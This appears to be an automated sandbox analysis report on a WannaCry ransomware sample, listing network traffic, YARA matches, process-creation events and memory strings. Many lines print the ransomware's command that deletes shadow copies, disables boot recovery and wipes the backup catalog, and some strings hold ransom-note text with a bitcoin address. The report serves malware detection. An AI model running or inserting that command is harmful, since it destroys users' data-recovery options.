              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49873 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.16:49877 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.16:49878 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 178.62.22.36:443 -> 192.168.2.16:49885 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49888 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.42.72.131:443 -> 192.168.2.16:49903 version: TLS 1.2

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 1956, type: MEMORYSTR
              Source: Yara matchFile source: 69.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000045.00000000.1517699744.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1426542169.000000000098A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1423162894.0000000000989000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe PID: 7412, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 1956, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPED
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1426542169.000000000098A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1426542169.000000000098A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1423162894.0000000000989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1423162894.0000000000989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
              Source: @WanaDecryptor@.exe, 00000045.00000000.1517699744.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: @WanaDecryptor@.exe, 00000045.00000000.1517699744.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
              Source: @WanaDecryptor@.exe, 0000004B.00000003.1530506863.00000000007BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33`
              Source: @WanaDecryptor@.exe, 0000004B.00000003.1530506863.00000000007BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: @WanaDecryptor@.exe, 0000004B.00000002.1531536935.00000000007E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33`
              Source: @WanaDecryptor@.exe, 0000004B.00000003.1530506863.0000000000796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~`;zrunascmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: @WanaDecryptor@.exe, 0000004B.00000002.1530917323.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ^zt/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: @WanaDecryptor@.exe, 0000004B.00000002.1531536935.00000000007E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: @WanaDecryptor@.exe, 0000004B.00000002.1531536935.00000000007A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~`;zrunascmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: svchost.exe, 00000055.00000000.1528499130.000001FA3642B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: svchost.exe, 00000055.00000000.1528327844.000001FA36402000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: svchost.exe, 00000055.00000000.1528419587.000001FA36413000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: cmd.exe, 00000059.00000002.1549074997.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\cmd.exe/cvssadmindeleteshadows/all/quiet&wmicshadowcopydelete&bcdedit/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenabledno&wbadmindeletecatalog-quiet1
              Source: cmd.exe, 00000059.00000002.1549074997.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows\SysWOW64\cmd.exe" c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: cmd.exe, 00000059.00000002.1548322643.000000000084C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: cmd.exe, 00000059.00000002.1548195508.0000000000790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\SysWOW64\cmd.exeWinSta0\Default%
              Source: cmd.exe, 00000059.00000002.1548322643.0000000000840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
              Source: cmd.exe, 00000059.00000002.1548322643.0000000000840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\SysWOW64\cmd.exeWinSta0\DefaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows=8f
              Source: cmd.exe, 00000059.00000002.1548322643.0000000000840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
